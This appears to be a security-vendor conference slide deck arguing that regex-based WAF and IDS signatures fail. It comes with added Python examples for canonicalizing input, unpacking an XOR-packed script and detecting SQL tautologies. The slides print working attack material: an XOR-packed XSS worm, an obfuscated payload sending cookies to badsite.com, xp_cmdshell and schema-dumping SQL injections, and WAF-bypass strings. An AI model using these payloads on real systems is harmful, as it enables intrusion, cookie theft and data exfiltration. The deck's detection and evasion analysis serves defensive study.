Dinosaurs will die

Renaud Bidou
DenyAll
PART I
ABOUT DINOSAURS
Securing & Accelerating Your Applications
7/7/2015
Deny All © 2012
DenyAll © 2013
Dinosaur Characteristics
• Huge
• Deadly
• Basic
• Awkward
• Stupid
• ???
But don’t get caught…
Dinosaurs Efficiency
• Dinosaurs are Huge and Deadly
→ So why don’t you have a dinosaur?
– To protect your home, your children, your car, your money…
1. Because they are extinct
→ Good answer, but try to be more imaginative
2. Because they are Stupid
→ They would eat me, my children, my car, my safe…
3. Because they are Basic and Awkward
→ They will miss an agile thief
They are still alive
Most of them
Species & Evolution
• Filtering
– Filtering Routers
– Stateful Firewalls
– Firewall-NG
• Detection & Prevention
– Honeypots
– HIDS
– NIDS
– IPS
– DoS Protection
– XML Firewalls
– WAF
– Filtering Reverse Proxy
Extinction is marked on both branches of the chart.
Dinosaurs Market Cap
$ 6,528,957,587
$ 11,014,181,827
$ 17,891,709,266
$ 109,504,360,000
$ 199,663,264,758
Dinosaurs Offering & Facts
BlackHat US 2013
• EVADING DEEP INSPECTION FOR FUN AND SHELL
– Yet another I(D|P)S bypass talk
– Highlights that bypass techniques detailed back in 2006 are still not fixed
– Provides even more bypass techniques
• FULLY ARBITRARY 802.3 PACKET INJECTION
– 100% innovation and research
– Found a way to “transform” UDP packets into TCP packets…
– Bypasses network firewalls… ANY network firewall…
• ') UNION SELECT `THIS_TALK` AS ('NEW OPTIMIZATION AND OBFUSCATION TECHNIQUES')%00
– Making SQL injections more efficient
– Bypassing WAF and I(D|P)S detection, again and again…
• POST EXPLOITATION OPERATIONS WITH CLOUD SYNCHRONIZATION SERVICES
– Exploiting cloud-based file systems to bypass DLP
PART II
CONTEXT OF EXTINCTION
Environmental changes
• Dinosaurs’ extinction is most probably due to a combination of environmental factors
– Asteroid collision: Chicxulub Crater in Mexico
– Major eruptions: the Deccan Traps near Reunion island
– Massive water withdrawal: due to pole ice caps formation
• Dinosaurs didn’t evolve fast enough…
• … while the rest of the ecosystem did
→ THEY DIED
→ HUMANS NOW RULE THE WORLD
IT environmental changes
New languages
→ HTML5 opens doors between iframes and parents
→ Browsers are turned into proxies
→ Thousands of new evasion combinations
New format
Play the 7 differences game
• HTTP
bookmarks_Link=www.example&bookmarks_Desc=my favorite website
• JSON
{"bookmarks":[{"Link":"www.example.com","Desc":"my favorite website"}]}
• XML/REST
<bookmarks>
<Link>www.example.com</Link>
<Desc>my favorite website</Desc>
</bookmarks>
<bookmarks Link="www.example.com" Desc="my favorite website" />
The 7 differences:
1. no & separator between parameters
2. no = separator between parameter names/values
3. suspicious characters
4. tags
5. no explicit data structure info
6. linear vs. hierarchical
7. multiple valid representations
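Added example, not code from the deck: the bookmark record above parsed from each of the three wire formats into one canonical list of (path, value) leaves, so that a single per-field check applies whatever the representation. Assumptions of this example: the path convention container.field, the underscore separator in form bodies as the slide spells it, and the constructed sample bodies (the form value uses www.example.com so that the three records compare equal).

```python
"""Parse the same record from three wire formats into one canonical view.

Added example, not code from the DenyAll deck. Standard library only; the
three sample messages are constructed from the deck's bookmark record.
"""
import json
from urllib.parse import parse_qsl
from xml.etree import ElementTree as ET

# Constructed samples: the one record in the representations the slide shows.
FORM_BODY = "bookmarks_Link=www.example.com&bookmarks_Desc=my%20favorite%20website"
JSON_BODY = '{"bookmarks":[{"Link":"www.example.com","Desc":"my favorite website"}]}'
XML_BODY_ELEMENTS = "<bookmarks><Link>www.example.com</Link><Desc>my favorite website</Desc></bookmarks>"
XML_BODY_ATTRS = '<bookmarks Link="www.example.com" Desc="my favorite website" />'


def _flatten(obj, prefix, out):
    """Walk nested dict/list values and record each leaf under a dotted path."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            _flatten(value, f"{prefix}.{key}" if prefix else key, out)
    elif isinstance(obj, list):
        for item in obj:  # list position is not part of the canonical path
            _flatten(item, prefix, out)
    else:
        out.append((prefix, str(obj)))


def canonical_fields(body, content_type):
    """Return sorted (path, value) leaves regardless of the wire format.

    Path convention (an assumption of this example): 'container.field'.
    Form bodies use '_' between container and field, as the slide does.
    """
    if content_type == "application/x-www-form-urlencoded":
        pairs = [(name.replace("_", ".", 1), value)
                 for name, value in parse_qsl(body, keep_blank_values=True)]
        return sorted(pairs)
    if content_type == "application/json":
        out = []
        _flatten(json.loads(body), "", out)
        return sorted(out)
    if content_type in ("application/xml", "text/xml"):
        root = ET.fromstring(body)
        out = []
        # Attribute form and child-element form are two spellings of one record.
        for name, value in root.attrib.items():
            out.append((f"{root.tag}.{name}", value))
        for child in root:
            out.append((f"{root.tag}.{child.tag}", (child.text or "").strip()))
        return sorted(out)
    raise ValueError(f"unsupported content type: {content_type}")


def inspect_leaves(fields, predicate):
    """Apply one per-value check to every decoded leaf; return the failing paths."""
    return [path for path, value in fields if not predicate(value)]


if __name__ == "__main__":
    views = [
        canonical_fields(FORM_BODY, "application/x-www-form-urlencoded"),
        canonical_fields(JSON_BODY, "application/json"),
        canonical_fields(XML_BODY_ELEMENTS, "application/xml"),
        canonical_fields(XML_BODY_ATTRS, "application/xml"),
    ]
    for view in views:
        print(view)
    print("all identical:", all(view == views[0] for view in views))
    print("leaves containing '<':", inspect_leaves(views[1], lambda v: "<" not in v))
```

The point of the canonical view is that the inspection logic never sees `&`, `=`, braces or tags at all: it sees field values, and the same value-level check runs on a form post, a JSON body or either XML spelling.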
Threats adapt to change…
No AlphaNum JavaScript
Common:
alert(1)
=
No AlphaNum:
([],[][[![]+[]][+[]][++[[]][+[]]+[++[[]][+[]]][+[]]+[++[[]][+[]]][+[]]]+[[]+{}][+[]][+!![]]+[!![]+[]][+[]][+!![]]+[!![]+[]][+[]][+[]]])()[[![]+[]][+[]][++[[]][+[]]]+[![]+[]][+[]][++[[]][+[]]+[++[[]][+[]]][+[]]]+[![]+[]][+[]][++[[]][+[]]+[++[[]][+[]]][+[]]+[++[[]][+[]]][+[]]+[++[[]][+[]]][+[]]]+[!![]+[]][+[]][+!![]]+[!![]+[]][+[]][+[]]](+!![])
Will not be blocked if you allow JSON structure characters…
Polymorphic JavaScript
/*worm start*/
var k=209;
var a=[
241,241,241,241,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,167,176,163,241,162,165,176,163,165,133,190,186,180,191,241,236,241,
246,254,251,166,190,163,188,241,162,165,176,163,165,251,254,246,253,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,
241,180,191,181,133,190,186,180,191,241,236,241,246,254,251,166,190,163,188,241,246,241,250,241,246,180,191,181,251,254,246,234,241,241,219,
241,241,241,241,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,183,164,191,178,165,184,190,191,241,180,191,178,190,181,180,249,
178,190,181,180,248,241,170,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,167,176,163,241,186,180,168,241,236,241,
156,176,165,185,255,183,189,190,190,163,249,156,176,165,185,255,163,176,191,181,190,188,249,248,241,251,241,227,228,231,248,234,241,241,219,
241,241,241,241,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,167,176,163,241,161,176,178,186,180,181,241,236,
241,162,165,176,163,165,133,190,186,180,191,241,250,241,246,167,176,163,241,186,236,246,241,250,241,186,180,168,241,250,241,246,234,167,176,
163,241,176,236,138,246,234,241,241,219,241,241,241,241,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,183,190,163,
241,249,167,176,163,241,184,241,236,241,225,234,241,184,241,237,241,178,190,181,180,255,189,180,191,182,165,185,234,241,184,250,250,248,241,
170,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,161,176,178,186,180,181,241,250,236,241,249,
178,190,181,180,255,178,185,176,163,146,190,181,180,144,165,249,184,248,241,143,241,186,180,168,248,241,250,241,246,253,246,234,241,241,219,
241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,172,241,241,219,241,241,241,241,241,241,219,241,241,241,241,241,241,241,241,241,
241,241,241,241,241,241,241,161,176,178,186,180,181,241,250,236,241,246,140,234,167,176,163,241,181,236,141,246,141,246,234,246,241,250,241,
241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,246,183,190,163,241,249,167,176,163,241,184,236,225,
234,184,237,176,255,189,180,191,182,165,185,234,184,250,250,248,246,241,250,241,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,
241,241,241,241,241,241,241,241,241,241,241,241,246,170,181,250,236,130,165,163,184,191,182,255,183,163,190,188,146,185,176,163,146,190,181,180,
249,176,138,184,140,143,186,248,234,172,180,167,176,189,249,181,248,234,246,241,250,241,180,191,181,133,190,186,180,191,234,241,241,219,241,
241,241,241,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,163,180,165,164,163,191,241,161,176,178,186,180,181,
234,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,172,241,241,219,241,241,241,241,241,241,219,241,241,241,241,241,241,241,241,
241,241,241,241,183,164,191,178,165,184,190,191,241,181,180,178,190,181,180,249,178,190,181,180,248,241,170,241,241,219,241,241,241,241,241,241,
241,241,241,241,241,241,241,241,241,241,167,176,163,241,186,180,168,156,176,165,178,185,241,236,241,178,190,181,180,255,188,176,165,178,185,
249,254,167,176,163,141,162,186,236,249,141,181,250,248,254,248,234,241,241,219,241,241,241,241,241,241,219,241,241,241,241,241,241,241,241,
241,241,241,241,241,241,241,241,184,183,241,249,186,180,168,156,176,165,178,185,241,236,236,241,191,164,189,189,248,241,170,241,241,219,241,
241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,176,189,180,163,165,249,246,186,180,168,241,191,190,165,241,183,190,
164,191,181,246,248,234,241,241,219,241,241,241,241,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,
241,163,180,165,164,163,191,234,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,172,241,241,219,241,241,241,241,
241,241,219,241,241,241,241,241,241,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,172,241,241,219,241,241,241,
241,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,163,180,165,164,163,191,241,164,191,161,176,178,186,180,181,234,
241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,172,241,241,219,241,241,241,241,241,241,219,241,241,241,241,241,241,241,241,241,
241,241,241,183,164,191,178,165,184,190,191,241,183,184,191,181,130,180,189,183,249,163,180,162,161,190,191,162,180,248,241,170,241,241,219,
241,176,165,180,181,241,178,190,181,180,241,190,164,165,241,165,190,241,176,241,165,180,169,165,176,163,180,176,255,241,241,219,241,241,241,
241,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,181,190,178,164,188,180,191,165,255,182,180,165,148,189,180,188,180,191,165,147,
168,152,181,249,246,169,162,162,134,190,163,188,246,248,255,167,176,189,164,180,241,236,241,180,191,178,190,181,180,181,234,241,241,219,241,
241,241,241,241,241,241,241,241,241,241,241
];
var d='';
for (var i=0;i<a.length;i++){d+=String.fromCharCode(a[i]^k);}
eval(d);
/*worm end*/
Slide annotations: var k=209 is the initialisation vector; the array a is the packed code; the for loop is the decoding; eval(d) is the execution.
Unpacked code (excerpt shown on the slide):
code = findSelf(document.body.innerHTML);
if (code.indexOf('var k=') == 0) {
code = decode(code);
}
var encoded = encode(code);
var currentTime = new Date()
var variant = currentTime.getTime();
var inject_code = 'name=Polymorphic&email='+variant+'&comments='+'<script>'+encoded+'<\/script>';
var request = new XMLHttpRequest();
request.open('post', 'http://10.1.3.22/cgi-bin/badstore.cgi?action=doguestbook');
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader("Content-length", inject_code.length);
request.setRequestHeader("Connection", "close");
request.send(inject_code);
Slide annotation on the last line: Your favorite CSRF \o/
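Added example, not part of the deck: how an analyst unpacks the XOR-packed array above in Python, mirroring the slide's decoding loop, and how the key is recovered when the visible var k= line has been stripped. The byte list is the first 56 values of the slide's array, transcribed from the page; the key-recovery heuristic (the most frequent byte in source code is a space) is an assumption of this example.

```python
"""Unpack an XOR-packed script and recover its single-byte key.

Added example, not code from the deck. PACKED_PREFIX is transcribed from the
first array line on the slide; 209 is the slide's own k.
"""
from collections import Counter

# First 56 values of the slide's packed array (transcribed from the page).
PACKED_PREFIX = (
    [241] * 6 + [219] + [241] * 12
    + [167, 176, 163, 241, 162, 165, 176, 163, 165, 133, 190, 186, 180, 191,
       241, 236, 241, 246, 254, 251, 166, 190, 163, 188, 241, 162, 165, 176,
       163, 165, 251, 254, 246, 253, 241, 241, 219]
)
SLIDE_KEY = 209


def xor_decode(values, key):
    """Mirror of the slide's loop: d += String.fromCharCode(a[i] ^ k)."""
    return "".join(chr(v ^ key) for v in values)


def guess_key(values):
    """Single-byte XOR key recovery.

    Assumption (an analyst's heuristic, not something the deck states): the
    most frequent byte of packed source code is the space character, so the
    key is most_common_byte XOR 0x20.
    """
    most_common, _count = Counter(values).most_common(1)[0]
    return most_common ^ 0x20


def looks_like_script(text):
    """Plausibility check on a candidate decoding: printable ASCII only and
    at least one JavaScript keyword present."""
    printable = all(32 <= ord(c) < 127 or c in "\r\n\t" for c in text)
    return printable and any(kw in text for kw in ("var ", "function", "eval("))


if __name__ == "__main__":
    key = guess_key(PACKED_PREFIX)
    print("recovered key:", key, "(slide says", SLIDE_KEY, ")")
    decoded = xor_decode(PACKED_PREFIX, key)
    print("plausible script:", looks_like_script(decoded))
    print(decoded)
```

With the recovered key the prefix decodes to the worm's first statement, which shows the self-replication markers it later searches for in the page. The plausibility check is what lets the same routine be run blind over all 256 keys on a sample where no k is visible.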
HTML5-based screenshot
• Screenshots with XSS
– Thanks to HTML5 <canvas> tag…
Actors on the diagram: Hacker, Relay, Victim Browser, Vulnerable App
1. Hacker exploits XSS vulnerability
2. Malicious Javascript is loaded on Victim
3. Victim executes Javascript
4. Victim sends screenshot
5. Hacker retrieves screenshot
Screenshot with XSS
Attackers get smarter…
Optimizing Injections
• Lowering blind injection attempts
– New techniques reduce “noise”
Timeline on the slide: 2005, 2009, 2013
• 2005: Remote command execution
– Check to see if xp_cmdshell is loaded
– If enabled, check if active
– Run the 'dir' command and store the results into TMP_DB
'IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id,N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell 'dir' SELECT @a='' SELECT @a=Replace(@a%2B'<br></font><font color="black">'%2Bdir,'<dir>','</font><font color="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSE SELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB-
• 2013: Dumping DB structure with 1 request
SELECT(@)FROM(SELECT(@:=0x00),(SELECT(@)FROM(information_schema.columns)WHERE(table_schema>=@)AND(@)IN(@:=CONCAT(@,0x0a,'[',table_schema,']>',table_name,'>',column_name))))x;
Result:
[information_schema]>COLUMNS>COLUMN_DEFAULT
[information_schema]>COLUMNS>IS_NULLABLE
[information_schema]>COLUMNS>DATA_TYPE
[information_schema]>COLUMNS>CHARACTER_MAXIMUM_LENGTH
[information_schema]>COLUMNS>CHARACTER_OCTET_LENGTH
[information_schema]>COLUMNS>NUMERIC_PRECISION
[information_schema]>COLUMNS>NUMERIC_SCALE
[information_schema]>COLUMNS>CHARACTER_SET_NAME
[information_schema]>COLUMNS>COLLATION_NAME
[information_schema]>COLUMNS>COLUMN_TYPE
[information_schema]>COLUMNS>COLUMN_KEY
[information_schema]>COLUMNS>EXTRA
[information_schema]>COLUMNS>PRIVILEGES
[information_schema]>COLUMNS>COLUMN_COMMENT
[information_schema]>COLUMN_PRIVILEGES>GRANTEE
[information_schema]>COLUMN_PRIVILEGES>TABLE_CATALOG
[information_schema]>COLUMN_PRIVILEGES>TABLE_SCHEMA
[information_schema]>COLUMN_PRIVILEGES>TABLE_NAME
[information_schema]>COLUMN_PRIVILEGES>COLUMN_NAME
[information_schema]>COLUMN_PRIVILEGES>PRIVILEGE_TYPE
Evading detection in 2013
• Encode
C0 BC = 11000000 10111100 ~ 11000000 00111100 = C0 3C
• Split words
netstat = net\stat = net^stat
• Comment “things”
-2 div 1 union all #in
#between comments
select 0x00, 0x41 like/*!31337table_name*/,3
from information_schema.tables limit 1
• Use unexpected “spaces”
Evasion: The Gig
%uC0BCaudio/\/\µ/src="ent.location='htt" id="p://badsite.com/steal?cookie=do/*sowhat*/cument.co/*noway*/okie'" title="docum" ononline="eval(title+src+id)">
Annotations on the slide:
– %uC0BC: misformatted (but handled by most browsers) MS Unicode representation for <
– audio: HTML5 tag
– /\/\µ/: surprisingly valid “space” substitution
Resulting code:
document.location='http://badsite.com/steal?cookie=do/*sowhat*/cument.co/*noway*/okie'
document.location='http://badsite.com/steal?cookie=document.cookie'
PART III
THE END OF AN ERA
Status
IT Environment changes
Threats evolve
Attackers get smarter
…
Dinosaurs don’t
Wafosaurus Regexipus
Regexipus?
Regexipus: n.f., gen. Regexus, Regular Expression
A sequence of characters that forms a search pattern
Core of past & present filtering engines (IDS, IPS, WAF)
Intensively used to create signatures against all types of suspicious content
Example: XSS protection through HTML event handler filtering
Asmus Rex: "/\\bonError(?:update)?\\W*=/Oi"
Snortus Fragilimus: "/\bonerror\b[\s]*=/Ri"
Modus Securitus: "(?i)([\s\"'`;\/0-9\=]+on\w+\s*=)"
Used in all wafosauri, to provide either positivus or negativus security models, since the late 90’s.
Probable causes of extinction:
• The canonical paradox
• The 1=1 syndrome
• The performance anomaly
The canonical paradox
Too many representations of the same string
Challenge: have 1 UNION SELECT 1 evade a herd of Wafosauri
Tip: use encoding, substitution, database specificities
Fortiwebus Minusculus: 1 U%FFNION S%A0E%B1L%C2E%D3C%E4T%F6
Asmus Rex: 1 UNION ALL SELECT 1
Libus Injectus: 1fUNION%0ASELECT 1
Modus Securitus: 1 MOD 0.2UNION%A0SELECT 1
ALL: 1 MOD 0.2U%FFNION%A0ALL%A0S%A0E%B1L%C2E%D3C%E4T%F6
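Added example, not DenyAll's code, covering the "Evading detection in 2013" slide and the canonical paradox above: a canonicalizer that reduces several spellings of an input to one form before any signature is applied. It undoes %XX and %uXXXX encoding, the overlong UTF-8 form C0 BC of '<', MySQL comments including the executed /*!NNNNN ... */ versioned form, and non-ASCII or control "spaces". Assumptions of this example: %uXXXX is read as two raw bytes, as the slide's payload intends; 3- and 4-byte UTF-8 sequences are left as raw bytes; '#' and '-- ' are treated as comments even inside string literals (a production canonicalizer would track quoting). Byte-in-keyword tricks such as U%FFNION depend on the target database's character-set handling and are deliberately not handled.

```python
"""Canonicalize a parameter value before inspection.

Added example, not code from the deck. Standard library only.
"""
import re
from urllib.parse import unquote_to_bytes

VERSIONED_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)  # MySQL executes the body
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)
LINE_COMMENT = re.compile(r"(?:#|-- )[^\n]*")


def decode_percent(value):
    """%uC0BC -> bytes C0 BC (assumption: two raw bytes), then ordinary %XX."""
    value = re.sub(r"%u([0-9A-Fa-f]{2})([0-9A-Fa-f]{2})", r"%\1%\2", value)
    return unquote_to_bytes(value)


def lenient_utf8(data):
    """Decode like a forgiving browser: accept overlong 2-byte sequences
    (C0 BC -> '<') and map any other stray high byte to its Latin-1 character."""
    out = []
    i = 0
    while i < len(data):
        byte = data[i]
        if byte < 0x80:
            out.append(chr(byte))
            i += 1
        elif 0xC0 <= byte <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            # 2-byte form, including the overlong C0/C1 leads a strict decoder rejects
            out.append(chr(((byte & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(byte))
            i += 1
    return "".join(out)


def strip_comments(text):
    """Drop comments but keep the body of versioned comments, since the
    database keeps it too; each comment becomes a token separator."""
    text = VERSIONED_COMMENT.sub(lambda m: f" {m.group(1)} ", text)
    text = BLOCK_COMMENT.sub(" ", text)
    return LINE_COMMENT.sub(" ", text)


def canonicalize(value):
    """One representation for the many spellings of the same input."""
    text = lenient_utf8(decode_percent(value))
    text = strip_comments(text)
    # \s covers tabs, newlines, form feeds and NO-BREAK SPACE (U+00A0)
    return re.sub(r"\s+", " ", text).strip().lower()


if __name__ == "__main__":
    for sample in (
        "-2 div 1 union all #in\n#between comments\nselect 0x00, 0x41 like/*!31337table_name*/,3\nfrom information_schema.tables limit 1",
        "%uC0BCaudio",
        "1 UNION%0ASELECT 1",
        "1 UNION%A0SELECT 1",
        "1 UNION/*!50000ALL*/SELECT 1",
    ):
        print(repr(sample), "->", repr(canonicalize(sample)))
```

Run on the slide's own samples, the comment-laden MySQL query, the %uC0BC prefix and the %0A / %A0 "spaces" all collapse to plain lowercase SQL or HTML that a single rule can be written against. What the canonicalizer cannot do is the slide's wider point: MOD 0.2UNION and 1fUNION stay fused, because separating them needs the database's own lexer rather than a character mapping.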
The 1=1 syndrome
1 like 1
1 = 1
2 <=> 3
2 = 2
1.0 = 1.0
not 1!=1
'a' <> 'b'
2 != 3
0.2 <= 7.9
17.5 - 3.12 < 1e3
0x50 = 0x50
0x2e REGEXP 0x2e
50 between 0 and 100
'b' between 'a' and 'c'
CHAR(97) RLIKE CHAR(97)
5 is not null
3 > 2
chr(97) ~ chr(97)
'a' LIKE 'a'
1=1 syndrome effect
How to catch 'OR 1=1 and its variants?
Asmus Rex:
"/\\bx?or\\b(?:\\s|(?:\\/\\*.*?\\*\\/)|[()\\[\\]\\+])*(?:(?:\\d+|n?[''\\x22].*?[''\\x22])|\\w+.*?\\(.*?\\)|(?:[x.()\\d+\\\\*\\/%~&|^\\s]|div)+(?:\\d)|null)+?(?:\\s|(?:\\/\\*.*?\\*\\/)|[()\\[\\]])*(?:\\bnot\\b.*?)?(?:[=<>!^|&]+|\\br?like\\b|\\bbetween\\b|\\bin\\b|\\bregexp\\b|(?:\\bis\\b.*?)(?:\\s|(?:\\/\\*.*?\\*\\/)|[()\\[\\]\\+])*(?:\\bnot\\b.*?)?)+(?:.*?\\bBINARY\\b)?(?:\\s|(?:\\/\\*.*?\\*\\/)|[()\\[\\]\\+])*(?:(?:\\d+|n?[''\\x22].*?[''\\x22]?)|\\w+.*?\\(.*?\\)|[x.()\\d+\\-\\*\\/%~&|^\\s]+(?:\\d)|null)+?/Vsi"
Will not block:
'or 0x2e REGEXP 0x2e
'or 17.5 - 3.12 < 1e3
'or TRUE
'or not 1!=1
'or chr(97) ~ chr(97)
etc...
And maintenance may be questionable…
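Added example, not DenyAll's code: the alternative to the regex above is to stop enumerating comparison operators and parse instead. The value is spliced into the slide's statement shape, SELECT a FROM t WHERE id='...', and tokenized; an injection shows up as tokens that spill out of the string literal, and the whole 'OR family shows up as a spilled OR/AND followed by a predicate that names no column at all, whatever operator it uses. The template query, the tokenizer and the CONSTANT_WORDS list are assumptions of this example.

```python
"""Detect the 'OR <always-true> family by tokenizing, not by pattern-matching.

Added example, not code from the deck. Standard library only.
"""
import re

# The slide's example statement; the parameter is meant to stay inside the literal.
TEMPLATE_PREFIX = "SELECT a FROM t WHERE id='"
TEMPLATE_SUFFIX = "'"

TOKEN = re.compile(r"""
    (?P<ws>\s+)
  | (?P<str>'(?:[^']|'')*'|\x22(?:[^\x22]|\x22\x22)*\x22)
  | (?P<num>0x[0-9a-f]+|\d+(?:\.\d+)?(?:e[+-]?\d+)?)
  | (?P<op><=>|!=|<>|<=|>=|=|<|>|~|\+|-|\*|/|%|!|\^|\||&|\(|\)|,)
  | (?P<word>[a-z_][a-z0-9_]*)
  | (?P<quote>['\x22`])
  | (?P<other>.)
""", re.I | re.X | re.S)

# Words that may appear in a predicate without naming any column or table.
CONSTANT_WORDS = {
    "and", "or", "xor", "not", "like", "rlike", "regexp", "between", "in", "is",
    "null", "true", "false", "unknown", "binary", "div", "mod", "char", "chr",
}


def tokenize(sql):
    return [(m.lastgroup, m.group()) for m in TOKEN.finditer(sql) if m.lastgroup != "ws"]


def spilled_tokens(value):
    """Tokens that follow the literal the value was supposed to stay inside.
    For a benign value this list is empty."""
    toks = tokenize(TEMPLATE_PREFIX + value + TEMPLATE_SUFFIX)
    for i, (kind, text) in enumerate(toks):
        if kind == "op" and text == "=":
            after = toks[i + 1:]
            return after[1:] if after and after[0][0] == "str" else after
    return []


def is_constant_predicate(tokens):
    """True when nothing in the run refers to data: only literals, operators
    and CONSTANT_WORDS. Such a predicate is always true or always false, so it
    has no business in a query and needs no per-operator rule."""
    if not tokens:
        return False
    return all(kind != "other" and (kind != "word" or text.lower() in CONSTANT_WORDS)
               for kind, text in tokens)


def spills_out_of_literal(value):
    """Weaker signal: the value broke the string literal it was placed in."""
    return bool(spilled_tokens(value))


def is_tautology_injection(value):
    tail = spilled_tokens(value)
    if tail and tail[-1][0] == "quote":  # the template's own closing quote, now unmatched
        tail = tail[:-1]
    if len(tail) < 2:
        return False
    kind, text = tail[0]
    return kind == "word" and text.lower() in ("or", "and", "xor") and is_constant_predicate(tail[1:])


if __name__ == "__main__":
    for value in ("'or 0x2e REGEXP 0x2e", "'or 17.5 - 3.12 < 1e3", "'or TRUE",
                  "'or not 1!=1", "'or chr(97) ~ chr(97)", "' or 'b' between 'a' and 'c'",
                  "salt or pepper", "O'Brien"):
        print(f"{value!r:36} spills={spills_out_of_literal(value)!s:5} tautology={is_tautology_injection(value)}")
```

Every variant listed on the slide is caught by the same forty lines, and a new operator costs one entry in CONSTANT_WORDS rather than a new alternation in a 700-character regex. The spill check also flags an apostrophe in O'Brien, which is correct: unescaped, that value does terminate the literal, and the fix belongs in the application (parameterized queries), not in the filter.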
The performance anomaly
Improve Security → 1=1 syndrome → Add thousands of rules (Modus Securitus: ~20,000 rules) → Impacts performance (throughput, false positives)
Improve Security → Canonical paradox → Handle more and more cases in each rule → Additional complexity leads to errors → Reduce scope of analysis → Lower security
Example rule, ~ (.*)* : EVIL REGEXP!!!!!!
/(?:\s|(?:\/\*.*?\*\/)|[()\[\]\+])*union(?:\s|(?:\/\*.*?\*\/)|[()\[\]\+])*select(?:\s|(?:\/\*.*?\*\/)|[()\[\]\+])*(?:(?:\d+|n?[''\x22].*?[''\x22])|\w+.*?\(.*?\)|(?:[x.()\d+\\*\/%~&|^\s]|div)+(?:\d)|null)+/
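Added example, not the deck's code: why a rule that behaves like (.*)* is itself a denial-of-service bug. The slide's signature is summarized as ~ (.*)*; EVIL below is the smallest pattern with the same nested-quantifier shape (an assumption of this example, not the slide's regex). A backtracking engine that fails to match must try every way of splitting the input between the inner and the outer quantifier, one attempt per composition of n, i.e. 2**(n-1) of them, before giving up; the linear check answers the same question in one pass.

```python
"""Nested quantifiers: exponential backtracking versus a single-pass check.

Added example, not code from the deck. EVIL stands in for the slide's rule.
"""
import re
import time
from functools import lru_cache

EVIL = re.compile(r"^(a+)+$")  # same nested-quantifier shape as the slide's ~ (.*)*


def evil_match(text):
    return EVIL.match(text) is not None


def linear_match(text):
    """Same language as EVIL (one or more 'a', nothing else), one pass, no backtracking."""
    return bool(text) and all(c == "a" for c in text)


@lru_cache(maxsize=None)
def compositions(n):
    """Ways to split a run of n characters into non-empty groups, enumerated the
    way the engine explores them (first group of size 1..n, then recurse).
    Equals 2**(n-1) for n >= 1."""
    if n == 0:
        return 1
    return sum(compositions(n - k) for k in range(1, n + 1))


def time_it(fn, text):
    start = time.perf_counter()
    result = fn(text)
    return result, time.perf_counter() - start


if __name__ == "__main__":
    for n in (8, 12, 16, 18):
        almost = "a" * n + "!"  # fails only at the last character
        _, regex_s = time_it(evil_match, almost)
        _, linear_s = time_it(linear_match, almost)
        print(f"n={n:2d}  splits tried={compositions(n):7d}  "
              f"regex={regex_s:8.4f}s  linear={linear_s:.6f}s")
```

Doubling the input length squares the regex's worst-case time while the linear check does not move; that is the throughput column of the slide's cycle, and it is also why a single crafted parameter can stall an inspection engine built this way.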
The fall of Regexipi
• You wanted a T. Rex to secure your IT
• And you had to disengage security
– Fear of false positives
• Disable features, create exceptions, stay in “warning” mode
– Lack of support for new protocols & data formats
• Things have changed slightly these last few years…
– No real evolution for ages
• The negative/positive security models are older than the Internet!
– Some platforms remain out of scope
• Voluntarily or not, part of your IT is not protected
• But you’ve got THAT
PART III
WILDLIFE EVOLUTION
Evolve … or Die
• Traditional engines will soon be obsolete
– Linear filters won’t catch anything anymore
• Adding thousands of filters will increase latency
• Adding thousands of filters will increase the false-positive rate
• Thousands of filters facing billions of combinations…
– Fear of false positives results in lowered security
– Current security engines are distraught
• A new generation of engines is required
• NOW!!
Evolution Path
• Analyzing content is no longer efficient
– Split, encoded, substituted, inserted...
– Format similar between legitimate and attack data
• No need (no chance?) to fully understand
• Need to identify the nature of the content
Kill the Regexipi!
1. Extend Canonization
– To deal with what you know
bookmarks::Link=www.example.com&bookmarks::Desc=my%20favorite%web%site;
2. Identify the nature of content
– Don’t try to understand, you just can’t
{"bookmarks":[{"Link":"www.example.com","Desc":"my favorite website"}]}
'or not 1!=1 → Valid SQL (SELECT a FROM t WHERE id='a)
